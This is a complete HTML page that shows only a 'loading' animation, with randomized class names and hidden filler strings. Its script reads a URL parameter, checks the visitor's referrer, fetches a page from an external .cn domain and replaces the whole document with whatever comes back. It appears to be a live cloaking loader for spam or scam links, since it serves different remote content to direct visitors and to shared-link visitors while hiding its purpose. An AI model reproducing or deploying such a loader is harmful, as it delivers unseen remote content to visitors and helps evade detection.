<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PyOB9axCKJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PyOB9axCKJ .a6CXLa {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PyOB9axCKJ .content {
            line-height: 50px;
            text-align: center
        }

        .PyOB9axCKJ .img {
            width: 100%
        }

        .PyOB9axCKJ .f74DTohA6 {
            text-align: center
        }

        .PyOB9axCKJ .f74DTohA6 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PyOB9axCKJ .f74DTohA6 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PyOB9axCKJ .f74DTohA6 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PyOB9axCKJ .f74DTohA6 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PyOB9axCKJ .f74DTohA6 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PyOB9axCKJ .f74DTohA6 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PyOB9axCKJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ld7zG9pMRSAgy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EesI4Sz = ld7zG9pMRSAgy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EesI4Sz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EesI4Sz +".html?a=share";
		}
		
        oc7A60Xb=url+"#"+new Date().getTime();
        oc7A60Xb && function() {
            $.get(oc7A60Xb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>EFulC4NL7rxy5lda3VQX2Kn56pcIKJIR</p>
<ul style='display:none' >pz9qVERrWLD6bYa4NthhkT</ul>
<div style='display:none'>NIHmTrTCK8QBM9bWoUo48177FnBYRdd20ZVAfWyTiC5sZBG6rM3j7JnVayy5J8</div>
<h1 style='display:none' >sCfmqT4Y4c3IN9O7qTZWdPp</h1><div class="PyOB9axCKJ">
    <div class="a6CXLa">
        <div class="f74DTohA6">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >pcw3L2EkoyLJphJBCYpM4FlLyfle80UPZJK73gq7lgIv4VDuC</li>
<p  style='display:none'>Q2Yhhr4D02onWe2KHQ8jY66qbP5TUvsTTQNw37zb2Q0Y1FaQtRfMLeIcas1IS82wKRLi</p>
<div style='display:none'>smTFDvurJu8CqWTgXExHZdkOiC0I</div>
<img  src='' style='display:none'>
<li style='display:none' >pcw3L2EkoyLJphJBCYpM4FlLyfle80UPZJK73gq7lgIv4VDuC</li></body>
</html>